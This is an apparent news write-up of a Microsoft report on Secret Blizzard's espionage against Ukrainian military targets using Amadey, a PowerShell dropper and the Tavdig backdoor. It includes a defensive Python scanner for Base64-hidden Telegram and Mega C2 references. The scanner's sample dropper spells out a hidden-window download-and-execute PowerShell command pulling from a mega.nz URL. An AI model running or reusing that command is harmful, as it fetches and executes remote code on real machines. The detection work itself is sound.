Microsoft has reported on a sophisticated cyber operation attributed to the group known as Secret Blizzard, which has utilized the Amadey malware to execute targeted attacks against specific entities. The nature of the attacks suggests that Secret Blizzard either employed Amadey as a malware-as-a-service or engaged with its command-and-control panels clandestinely to deploy a PowerShell dropper onto victim devices. This dropper was found to contain a Base64-encoded payload linked to Amadey, alongside code designed to establish communication with Secret Blizzard’s own C2 infrastructure.
The primary aim of this operation was to deploy Tavdig, a backdoor tool that enables Secret Blizzard to conduct thorough reconnaissance on its selected targets. The Amadey variant detected by Microsoft was programmed to extract sensitive data such as clipboard contents and passwords stored in web browsers. Following this data collection, Secret Blizzard would deploy a specialized reconnaissance tool targeted at particular devices, notably those associated with STARLINK IP addresses, which are frequently identified as being linked to military operations in Ukraine.
In cases where Secret Blizzard identified high-value targets, the group would proceed to install Tavdig for detailed data gathering. Information collected included user profiles, network statistics, installed software patches, and registry settings on compromised devices. This method of intelligence gathering underscores a strategic focus on entities of significant interest, particularly within military contexts.
Moreover, this year, Microsoft investigators observed Secret Blizzard incorporating tools from a separate threat group known as Storm-1837 to further its espionage efforts against Ukrainian military personnel. In an incident documented in January 2024, a military device in Ukraine was breached through a backdoor related to Storm-1837, which was configured to use the Telegram API to launch PowerShell commands. These commands were likely intended to establish unauthorized remote access to accounts on the Mega file-sharing platform, so that further commands or files could be downloaded and executed on the infiltrated device.
As noted, the PowerShell dropper employed in this instance exhibited similarities to the one used in conjunction with Amadey, resulting in deployable elements that included the previously mentioned Tavdig payload along with a Symantec binary. In doing so, Secret Blizzard not only sought initial access through the deployment of malicious tools but also implemented persistence mechanisms to maintain access through the KazuarV2 backdoor.
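The two mechanisms described above, a PowerShell dropper carrying a Base64-encoded payload and a backdoor that reaches Telegram and Mega for tasking, leave a recognisable trace in scripts: the C2 references are hidden inside Base64 blobs rather than written in the clear. The triage helper below is an added example, not Microsoft's tooling or anything from the report; the indicator list and the inert sample script it scans are constructed for illustration.

```python
import base64
import re

# Constructed indicators for the tradecraft the article describes: Telegram API
# for tasking and Mega for file retrieval.
C2_INDICATORS = ("api.telegram.org", "mega.nz")
# Long Base64 runs: a dropper's embedded payload or an -EncodedCommand argument.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decoded_views(blob: str) -> list[str]:
    """Decode one Base64 run into the text views worth scanning: a byte-for-byte
    latin-1 view and, when the length allows, a UTF-16LE view (the encoding
    PowerShell uses for -EncodedCommand)."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # not real Base64 (e.g. a long hex or random token)
        return []
    views = [raw.decode("latin-1")]
    if len(raw) % 2 == 0:
        views.append(raw.decode("utf-16le", errors="ignore"))
    return views


def find_hidden_indicators(script_text: str) -> list[str]:
    """Return the sorted C2 indicators found inside Base64 blobs of a script.
    Clear-text mentions are ignored on purpose: a hit means the reference was
    encoded, which is the dropper behaviour worth alerting on."""
    hits = set()
    for blob in B64_RUN.findall(script_text):
        for view in decoded_views(blob):
            hits.update(ind for ind in C2_INDICATORS if ind in view)
    return sorted(hits)


def build_sample_dropper() -> str:
    """Constructed, inert stand-in for the dropper pattern in the article: a
    Base64 payload carrying a Telegram API URL plus an -EncodedCommand that
    points at Mega. Nothing here comes from a real sample."""
    payload = base64.b64encode(
        b"MZ-stub;Invoke-WebRequest https://api.telegram.org/bot<TOKEN>/getUpdates"
    ).decode()
    encoded_cmd = base64.b64encode(
        "IEX (New-Object Net.WebClient).DownloadString('https://mega.nz/file/X')"
        .encode("utf-16le")
    ).decode()
    return (
        f"$p = [Convert]::FromBase64String('{payload}')\n"
        f"powershell.exe -NoP -W Hidden -EncodedCommand {encoded_cmd}\n"
    )
```

Run against PowerShell script-block logs or quarantined `.ps1` files; a non-empty result on a host that has no business talking to Telegram or Mega is a reasonable trigger for the Tavdig-style follow-on activity the article describes.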
While Microsoft did not directly observe the Storm-1837 backdoor downloading the Tavdig loader, the timing of the two activities suggests a strong likelihood that it was employed as part of a coordinated effort by Secret Blizzard to execute the attack. This points to a layered approach to intrusions, in which tooling and access from other threat groups are stacked to make the operation harder to attribute and more effective.
This recent disclosure by Microsoft follows earlier reports of Secret Blizzard’s collaboration with tools from the Pakistan-based threat group Storm-0156, with efforts focused on gathering intelligence in South Asia. Microsoft’s continuous monitoring has revealed that over the past seven years, Secret Blizzard has capitalized on the infrastructures and methodologies of at least six different threat groups, illustrating the group’s adaptive nature and emphasis on strategic intelligence gathering.
Considering the tactics and techniques employed, Secret Blizzard's activity maps onto several stages of the MITRE ATT&CK framework. Initial access via malware deployment, persistence through backdoor installation, and reconnaissance activities represent critical phases of its operational strategy. As organizations confront these evolving threats, understanding these attack patterns becomes essential for developing robust cybersecurity defenses.